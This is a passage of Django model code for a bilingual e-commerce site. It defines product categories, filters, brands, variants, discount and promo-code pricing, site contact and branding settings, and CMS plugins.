Q(categories__parent__parent=self)\n | Q(categories__parent__parent__parent=self),\n active=True).order_by(\"id\")\n return result\n\n def get_absolute_url(self):\n name = \"-\".join(self.name.lower().split(' '))\n if self.get_current_language() == \"en\":\n return urljoin(\"/en/products/category/\", str(self.id) + '-' + name)\n return urljoin(\"/fr/produits/category/\", str(self.id) + '-' + name)\n\n\nclass ProductCategoryTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Product Category\n \"\"\"\n\n master = models.ForeignKey(\n ProductCategory,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Category Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductFilterGroup(TranslatableModel):\n\n name = models.CharField(\n verbose_name=_(\"Filter's Group Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Filter Group\")\n verbose_name_plural = _(\"Product's Filter Groups\")\n ordering = [\"order\", \"name\"]\n\n def __str__(self):\n return self.name\n\n\nclass ProductFilterGroupTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductFilterGroup\n \"\"\"\n\n master = models.ForeignKey(\n ProductFilterGroup,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Filter's Group Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductFilter(TranslatableModel):\n \"\"\"\n A model to help to filter products.\n Product can have multiple filters.\n \"\"\"\n group = models.ForeignKey(\n ProductFilterGroup,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Filter Group\"),\n blank=True,\n null=True,\n help_text=_(\"Add a group to Filter.\")\n )\n name = models.CharField(\n verbose_name=_(\"Filter's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n image = image.FilerImageField(\n verbose_name=_(\"image\"),\n related_name=\"filter_image\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n help_text=_(\"Size: 2000x900.\\\n An 
image that will be shown on the top of the page of\\\n the Products of this filter.\")\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Filter\")\n verbose_name_plural = _(\"Product's Filters\")\n ordering = [\"group\", \"order\", \"-pk\"]\n\n def __str__(self):\n if self.group:\n return self.group.name + \" : \" + self.name\n return self.name\n\n\nclass ProductFilterTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductFilter\n \"\"\"\n\n master = models.ForeignKey(\n ProductFilter,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Filter's Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n description = models.TextField(\n null=True, blank=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductBrand(models.Model):\n \"\"\"\n A model to help to brands products.\n Product can only have one brand.\n \"\"\"\n\n name = models.CharField(\n verbose_name=_(\"Brand's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n logo = image.FilerImageField(\n verbose_name=_(\"Logo\"),\n related_name=\"brand_logo\",\n on_delete=models.SET_NULL,\n blank=True,\n null=True,\n help_text=_(\"Size: 300x300.\")\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Brand\")\n verbose_name_plural = _(\"Product's Brands\")\n ordering = [\"order\", \"name\"]\n\n def __str__(self):\n return self.name\n\n def get_products(self):\n result = Product.objects.filter(\n brand=self,\n active=True\n ).order_by(\"id\")\n return result\n\n\nclass ProductLabel(TranslatableModel):\n \"\"\"\n A model to add a custom label\n on product's media.\n \"\"\"\n\n name = TranslatedField()\n colour = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#000\",\n null=False,\n blank=False\n )\n bg_colour = ColorField(\n verbose_name=_(\"Background's Colour\"),\n default=\"#fff\",\n null=False,\n blank=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Label\")\n verbose_name_plural = _(\"Product's Labels\")\n ordering = [\"-pk\"]\n\n def __str__(self):\n try:\n if self.name:\n return self.name\n return str(self.pk)\n except Exception:\n return str(self.pk)\n\n\nclass ProductLabelTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductLabel\n \"\"\"\n\n master = models.ForeignKey(\n ProductLabel,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name = models.CharField(\n verbose_name=_(\"Label's Name\"),\n max_length=25,\n null=False,\n blank=False,\n help_text=_(\"Maximum 25 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\n#######################################################################\n# Produits\n#######################################################################\n\n\nclass Product(CMSPageReferenceMixin, TranslatableModelMixin, BaseProduct):\n \"\"\"\n A basic model to handle polymorphic Product\n \"\"\"\n product_name = models.CharField(\n _(\"Product's Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n product_name_trans = TranslatedField()\n slug = AutoSlugField(\n 
populate_from=\"product_name\",\n unique=True\n )\n categories = models.ManyToManyField(\n ProductCategory,\n verbose_name=_(\"Categories\"),\n blank=True\n )\n filters = models.ManyToManyField(\n ProductFilter,\n verbose_name=_(\"Filters\"),\n blank=True\n )\n brand = models.ForeignKey(\n ProductBrand,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Brand\"),\n blank=True,\n null=True\n )\n label = models.ForeignKey(\n ProductLabel,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Custom Label\"),\n blank=True,\n null=True,\n help_text=_(\"Add a custom label to the product.\")\n )\n is_vedette = models.BooleanField(\n verbose_name=_(\"Featured\"),\n default=False\n )\n caption = TranslatedField()\n description = TranslatedField()\n order = models.PositiveIntegerField(\n verbose_name=_(\"Sort by\"),\n db_index=True\n )\n cms_pages = models.ManyToManyField(\n \"cms.Page\",\n through=ProductPage\n )\n main_image = image.FilerImageField(\n verbose_name=_(\"Main Image\"),\n on_delete=models.SET_NULL,\n related_name=\"main_image\",\n null=True,\n blank=True\n )\n images = models.ManyToManyField(\n \"filer.Image\",\n through=ProductImage\n )\n\n class Meta:\n verbose_name = _(\"Product\")\n verbose_name_plural = _(\"Products\")\n ordering = [\"order\"]\n\n objects = ProductManager()\n\n lookup_fields = [\"product_name__icontains\", \"description__icontains\"]\n\n def __str__(self):\n return self.product_name\n\n def get_absolute_url(self):\n page = Page.objects.filter(reverse_id=\"produits\").first()\n if page is not None:\n return urljoin(page.get_absolute_url(), self.slug)\n return \"\"\n\n @property\n def sample_image(self):\n if self.main_image:\n return self.main_image\n else:\n return self.images.first()\n\n\nclass ProductTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Product\n \"\"\"\n\n master = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n product_name_trans = models.CharField(\n _(\"Product's Name\"),\n max_length=255,\n null=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n caption = HTMLField(\n verbose_name=_(\"Caption\"),\n configuration=\"CKEDITOR_SETTINGS_CAPTION\",\n blank=True,\n null=True,\n help_text=_(\"Short description.\")\n )\n description = HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n blank=True,\n null=True,\n help_text=_(\"Long description.\"),\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\n# ===---\n\n\nclass ProductDefault(AvailableProductMixin, Product):\n \"\"\"\n A basic Product, polymorphic child of Product\n \"\"\"\n\n product_code = models.CharField(\n _(\"Product's Code\"),\n max_length=255,\n unique=True,\n help_text=_(\"A unique code.\\\n Maximum 255 characters.\\\n Prioritize creating a new product instead of\\\n updating this code.\")\n )\n unit_price = MoneyField(\n _(\"Unit Price\"),\n decimal_places=3,\n help_text=_(\"Net price for this product.\")\n )\n quantity = models.PositiveIntegerField(\n _(\"Quantity\"),\n default=0,\n validators=[MinValueValidator(0)],\n help_text=_(\"Available quantity in stock.\")\n )\n multilingual = TranslatedFields(\n description=HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n help_text=_(\"Long description.\")\n )\n )\n discounted_price = MoneyField(\n _(\"Discounted Unit Price\"),\n decimal_places=3,\n null=True,\n blank=True,\n default=0,\n help_text=_(\"Net discounted price for this 
product.\")\n )\n start_date = models.DateTimeField(\n _(\"Discount Start DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Start DateTime Discount\"),\n )\n end_date = models.DateTimeField(\n _(\"Discount Stop DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Stop DateTime Discount\"),\n )\n\n class Meta:\n verbose_name = _(\"Default Product\")\n verbose_name_plural = _(\"Default Products\")\n\n @property\n def get_caption(self):\n if self.caption:\n c = TAG_RE.sub(\"\", self.caption)\n return c\n return \"\"\n\n @property\n def get_description(self):\n if self.description:\n desc = TAG_RE.sub(\"\", self.description)\n return desc\n return \"\"\n\n @property\n def is_discounted(self):\n if self.discounted_price == Money(0) or \\\n self.discounted_price is None or \\\n self.start_date is None or \\\n self.end_date is None:\n return False\n today = pytz.utc.localize(datetime.utcnow())\n if self.start_date < today and self.end_date > today:\n return True\n return False\n\n def get_price(self, request=None): # noqa C910\n r = self.unit_price\n\n if self.is_discounted:\n r = self.discounted_price\n\n # ===--- GET DISCOUNTS\n if dmRabaisPerCategory is not None:\n r = get_apply_discountpercategory(self, r, self.is_discounted)\n\n if request:\n # ===--- GET PROMOCODE\n if dmPromoCode is not None:\n try:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_cat = self.categories.all()\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=all_cat)\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__apply_on_cart=False),\n customer=customer,\n is_expired=False\n ).distinct()\n if all_codes.count() > 0:\n for d in all_codes:\n is_true = d.promocode.can_apply_on_discounted\n if not self.is_discounted or (\n self.is_discounted and is_true\n ):\n if d.promocode.amount is not None:\n r = Money(\n Decimal(r) - Decimal(\n d.promocode.amount\n )\n )\n elif d.promocode.percent is not None:\n pourcent = Decimal(\n d.promocode.percent) / Decimal(\"100\")\n discount = Money(\n Decimal(self.unit_price) * pourcent)\n r = r - discount\n except Exception:\n print(\"Error on ProductDefault's get_price\")\n if Decimal(r) <= 0:\n r = Money(0)\n return r\n\n def get_promocodes(self, request):\n if dmPromoCode:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n if self.is_discounted:\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=self.categories.all())\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n ) & Q(promocode__is_active=True)\n & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__can_apply_on_discounted=True),\n customer=customer,\n is_expired=False\n ).distinct()\n else:\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=self.categories.all())\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n )\n & Q(promocode__is_active=True) & (\n 
Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)),\n customer=customer,\n is_expired=False\n ).distinct()\n return all_codes\n\n def get_realprice(self):\n return self.unit_price\n\n\n# ===---\n\n\nclass ProductVariable(Product):\n \"\"\"\n A basic variable Product, polymorphic child of Product,\n parent of ProductVariableVariant.\n \"\"\"\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 30 characters.\")\n )\n multilingual = TranslatedFields(\n description=HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n help_text=_(\"Long description.\")\n )\n )\n\n class Meta:\n verbose_name = _(\"Variable Product\")\n verbose_name_plural = _(\"Variable Products\")\n\n default_manager = ProductManager()\n\n @property\n def get_caption(self):\n if self.caption:\n c = TAG_RE.sub(\"\", self.caption)\n return c\n return \"\"\n\n @property\n def get_description(self):\n if self.description:\n desc = TAG_RE.sub(\"\", self.description)\n return desc\n return \"\"\n\n def get_price(self, request=None):\n if not hasattr(self, \"_price\"):\n if self.variants.exists():\n currency = self.variants.first().unit_price.currency\n aggr = self.variants.aggregate(models.Min(\"unit_price\"))\n self._price = MoneyMaker(currency)(aggr[\"unit_price__min\"])\n else:\n self._price = Money()\n return self._price\n\n def get_availability(self, request, **kwargs):\n variant = self.get_product_variant(**kwargs)\n return variant.get_availability(request)\n\n def deduct_from_stock(self, quantity, **kwargs):\n variant = self.get_product_variant(**kwargs)\n variant.deduct_from_stock(quantity)\n\n def is_in_cart(self, cart, watched=False, **kwargs):\n try:\n product_code = kwargs[\"product_code\"]\n except KeyError:\n return\n cart_item_qs = CartItem.objects.filter(cart=cart, product=self)\n for cart_item in cart_item_qs:\n if cart_item.product_code == product_code:\n return cart_item\n\n def get_product_variant(self, **kwargs):\n try:\n product_code = kwargs.get(\"product_code\")\n return self.variants.get(product_code=product_code)\n except ProductVariableVariant.DoesNotExist as e:\n raise ProductVariable.DoesNotExist(e)\n\n def get_product_variants(self):\n return self.variants.all()\n\n def get_product_attribute(self):\n if self.variants.all():\n data = {}\n for a in self.variants.all()[0].attribute.all():\n if a.attribute.name not in data:\n data[a.attribute.name] = []\n for d in data:\n data[d] = list(\n AttributeValue.objects.filter(\n attribute__name=d\n ).values_list('value', flat=True)\n )\n return data\n\n def get_attribute_values(self):\n if self.variants.all():\n data = {}\n data[\"key\"] = []\n data[\"value\"] = []\n for v in self.variants.all():\n for a in v.attribute.all():\n if a.attribute.name not in data[\"key\"]:\n data[\"key\"].append(a.attribute.name)\n if a.value not in data[\"value\"]:\n data[\"value\"].append(a.value)\n return data\n\n\nclass Attribute(TranslatableModel):\n name = models.CharField(\n verbose_name=_(\"Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. 
Maximum 30 characters.\")\n )\n\n class Meta:\n verbose_name = _(\"Product's Attribute\")\n verbose_name_plural = _(\"Product's Attributes\")\n\n def __str__(self):\n return self.name\n\n\nclass AttributeValue(TranslatableModel):\n attribute = models.ForeignKey(\n Attribute,\n on_delete=models.CASCADE,\n verbose_name=_(\"Attribute\"),\n related_name=\"attribute\"\n )\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 30 characters.\")\n )\n value = models.CharField(\n verbose_name=_(\"Attribute Value\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n value_trans = TranslatedField()\n\n def __str__(self):\n return self.attribute.name + ' - ' + self.value\n\n\nclass AttributeTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Attribute\n \"\"\"\n\n master = models.ForeignKey(\n Attribute,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass AttributeValueTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Attribute Value\n \"\"\"\n\n master = models.ForeignKey(\n AttributeValue,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n value_trans = models.CharField(\n verbose_name=_(\"Translated Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductVariableVariant(AvailableProductMixin, models.Model):\n \"\"\"\n A basic variant of ProductVariable, will be used to populate\n cart item data.\n \"\"\"\n\n product = models.ForeignKey(\n ProductVariable,\n on_delete=models.CASCADE,\n verbose_name=_(\"Product\"),\n related_name=\"variants\"\n )\n product_code = models.CharField(\n _(\"Product's Code\"),\n max_length=255,\n unique=True,\n help_text=_(\"A unique code.\\\n Maximum 255 characters.\\\n Prioritize creating a new product instead of\\\n updating this code.\")\n )\n attribute = models.ManyToManyField(\n AttributeValue,\n verbose_name=_(\"Attribute\"),\n blank=True\n )\n unit_price = MoneyField(\n _(\"Unit Price\"),\n decimal_places=3,\n help_text=_(\"Net price for this product.\")\n )\n quantity = models.PositiveIntegerField(\n _(\"Quantity\"),\n default=0,\n validators=[MinValueValidator(0)],\n help_text=_(\"Available quantity in stock.\")\n )\n discounted_price = MoneyField(\n _(\"Discounted Unit Price\"),\n decimal_places=3,\n null=True,\n blank=True,\n default=0,\n help_text=_(\"Net discounted price for this product.\")\n )\n start_date = models.DateTimeField(\n _(\"Discount Start DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Start DateTime Discount\"),\n )\n end_date = models.DateTimeField(\n _(\"Discount Stop DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Stop DateTime Discount\"),\n )\n variant_image = image.FilerImageField(\n verbose_name=_(\"Variant Image\"),\n on_delete=models.SET_NULL,\n related_name=\"variant_image\",\n null=True,\n blank=True,\n help_text=_(\"Recommended size: 810x900.\")\n )\n\n class Meta:\n verbose_name = _(\"Product Variant\")\n verbose_name_plural = _(\"Product Variants\")\n\n def __str__(self):\n return _(\"{product}\").format(product=self.product)\n\n @property\n def 
is_discounted(self):\n if self.discounted_price == Money(0) or self.discounted_price is None:\n return False\n today = pytz.utc.localize(datetime.utcnow())\n if not self.start_date:\n return False\n if self.start_date < today and not self.end_date:\n return True\n elif self.start_date < today and self.end_date > today:\n return True\n\n def get_price(self, request=None): # noqa: C901\n r = self.unit_price\n\n if self.is_discounted:\n r = self.discounted_price\n\n # ===--- GET DISCOUNTS\n if dmRabaisPerCategory is not None:\n r = get_apply_discountpercategory(\n self.product,\n r,\n self.is_discounted\n )\n\n if request:\n # ===--- GET PROMOCODE\n if dmPromoCode is not None:\n try:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_cat = self.product.categories.all()\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=all_cat)\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self.product])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__apply_on_cart=False),\n customer=customer,\n is_expired=False\n ).distinct()\n if all_codes.count() > 0:\n for d in all_codes:\n if not self.is_discounted or (\n self.is_discounted and\n d.promocode.can_apply_on_discounted\n ):\n if d.promocode.amount is not None:\n r = Money(\n Decimal(r) - Decimal(\n d.promocode.amount\n )\n )\n elif d.promocode.percent is not None:\n pourcent = Decimal(\n d.promocode.percent\n ) / Decimal(\"100\")\n discount = Money(\n Decimal(self.unit_price) * pourcent\n )\n r = r - discount\n except Exception:\n print(\"Error on ProductVariableVariant's get_price\")\n if Decimal(r) <= 0:\n r = Money(0)\n return r\n\n def get_promocodes(self, request):\n if dmPromoCode is not None:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(\n promocode__categories__in=self.product.categories.all()\n )\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self.product])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ),\n customer=customer,\n is_expired=False\n ).distinct()\n return all_codes\n\n def get_realprice(self):\n return self.unit_price\n\n\nclass ProductDocument(models.Model):\n\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name=_(\"Product\"),\n related_name=\"product_document\"\n )\n name = models.CharField(\n verbose_name=_(\"Document's Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n document = FilerFileField(\n verbose_name=_(\"Document\"),\n on_delete=models.CASCADE,\n null=False,\n blank=False\n )\n\n class Meta:\n verbose_name = _(\"Product Document\")\n verbose_name_plural = _(\"Product Documents\")\n\n def __str__(self):\n return self.name\n\n\n#######################################################################\n# Plugins\n#######################################################################\n\n\nclass dmSite(models.Model):\n \"\"\"\n A model to replace sites.Site and help handles site's data.\n \"\"\"\n\n site = 
models.ForeignKey(\n sites.models.Site,\n on_delete=models.CASCADE,\n related_name=\"dmsite\"\n )\n google_analytics = models.TextField(\n verbose_name=_(\"Google Analytics Snippet\"),\n blank=True,\n null=True\n )\n\n class Meta:\n verbose_name = _(\"Site\")\n verbose_name_plural = _(\"Site\")\n\n def __str__(self):\n return self.site.name\n\n\nclass dmSiteLogo(models.Model):\n \"\"\"\n Logo's data (light and dark version) of the site.\n Can be used to easily retrieve and update logo\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"logos\"\n )\n logolight = image.FilerImageField(\n verbose_name=_(\"Logo pour fond clair\"),\n on_delete=models.SET_NULL,\n related_name=\"logo_light\",\n blank=False,\n null=True\n )\n logodark = image.FilerImageField(\n verbose_name=_(\"Logo pour fond sombre\"),\n on_delete=models.SET_NULL,\n related_name=\"logo_dark\",\n blank=False,\n null=True\n )\n favico_180 = image.FilerImageField(\n verbose_name=_(\"Favicon 180x180\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_180\",\n blank=True,\n null=True,\n help_text=_(\"Size: 180x180. Format: .png\")\n )\n favico_192 = image.FilerImageField(\n verbose_name=_(\"Favicon 192x192\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_192\",\n blank=True,\n null=True,\n help_text=_(\"Size: 192x192. Format: .png\")\n )\n favico_512 = image.FilerImageField(\n verbose_name=_(\"Favicon 512x512\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_512\",\n blank=True,\n null=True,\n help_text=_(\"Size: 512x512. Format: .png\")\n )\n favico_ico = FilerFileField(\n verbose_name=_(\"Favicon 48x48\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_ico\",\n blank=True,\n null=True,\n help_text=_(\"Size: 48x48. Format: .ico\")\n )\n\n class Meta:\n verbose_name = _(\"Logo\")\n verbose_name_plural = _(\"Logos\")\n\n def __str__(self):\n return \"Logo\"\n\n\nclass dmSiteContact(TranslatableModel):\n \"\"\"\n Contact's data (phone, email, address, etc.) 
about the site.\n Can be used to easily retrieve and update contact's data\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"contacts\"\n )\n phone = models.CharField(\n verbose_name=_(\"Phone\"),\n max_length=20,\n blank=True,\n null=True\n )\n phone_secondary = models.CharField(\n verbose_name=_(\"Secondary Phone\"),\n max_length=20,\n blank=True,\n null=True,\n help_text=_(\"Facultative.\")\n )\n email = models.CharField(\n verbose_name=_(\"Email\"),\n max_length=1000,\n blank=True,\n null=True\n )\n address = models.CharField(\n verbose_name=_(\"Address\"),\n max_length=1000,\n blank=True,\n null=True\n )\n schedule = TranslatedField()\n map_latitude = models.CharField(\n verbose_name=_(\"Map Latitude\"),\n max_length=120,\n blank=True,\n null=True\n )\n map_longitude = models.CharField(\n verbose_name=_(\"Map Longitude\"),\n max_length=120,\n blank=True,\n null=True\n )\n\n class Meta:\n verbose_name = _(\"Contacts\")\n verbose_name_plural = _(\"Contacts\")\n\n def __str__(self):\n return \"Contacts\"\n\n\nclass dmSiteContactTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of dmSiteContact\n \"\"\"\n\n master = models.ForeignKey(\n dmSiteContact,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n schedule = models.TextField(\n verbose_name=_(\"Schedule\"),\n blank=True,\n null=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass dmSiteSocial(models.Model):\n \"\"\"\n Social media's links (facebook, intagram, youtube, etc.) of the site.\n Can be used to easily retrieve and update social medias\n all around the site.\n \"\"\"\n\n CHOIX_SOCIALS = [\n (1, _(\"Facebook\")),\n (2, _(\"Instagram\")),\n (3, _(\"Youtube\")),\n (4, _(\"Twitter\"))\n ]\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"social\"\n )\n social = models.PositiveSmallIntegerField(\n verbose_name=_(\"Social Network\"),\n choices=CHOIX_SOCIALS,\n default=1\n )\n url = models.CharField(\n verbose_name=_(\"Link\"),\n max_length=1000\n )\n\n class Meta:\n verbose_name = _(\"Social Network\")\n verbose_name_plural = _(\"Social Networks\")\n\n def __str__(self):\n return self.url\n\n\nclass dmSiteTermsAndConditions(TranslatableModel):\n \"\"\"\n Terms and Conditions text of the site.\n Can be used to easily retrieve and show Terms and Conditions\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"termsandconditions\"\n )\n text = TranslatedField()\n\n class Meta:\n verbose_name = _(\"Terms and Conditions\")\n verbose_name_plural = _(\"Terms and Conditions\")\n\n def __str__(self):\n return \"Terms and Conditions\"\n\n\nclass dmSiteTermsAndConditionsTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of dmSiteTermsAndConditions\n \"\"\"\n\n master = models.ForeignKey(\n dmSiteTermsAndConditions,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n blank=True,\n null=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass FeatureList(models.Model):\n\n feature_name = models.CharField(\n verbose_name=_(\"Feature Name\"),\n max_length=100\n )\n is_enabled = models.BooleanField(\n verbose_name=_(\"Is enabled?\"),\n default=False\n )\n\n class Meta:\n verbose_name = _(\"Feature List\")\n 
verbose_name_plural = _(\"Feature Lists\")\n\n def __str__(self):\n return self.feature_name\n\n\n#######################################################################\n# Plugins\n#######################################################################\n\n\nclass dmProductsCategories(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=255,\n default=\"See all\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\\\n Maximum 255 characters.\\\n Leave blank to hide button.\")\n )\n\n\nclass dmProductsVedette(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n\n\nclass dmProductsByCategory(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n bg_image = image.FilerImageField(\n verbose_name=_(\"Background's Image\"),\n on_delete=models.SET_NULL,\n related_name=\"bg_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 2000x900.\")\n )\n\n\nclass dmProductsBrands(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n howmany = models.PositiveSmallIntegerField(\n 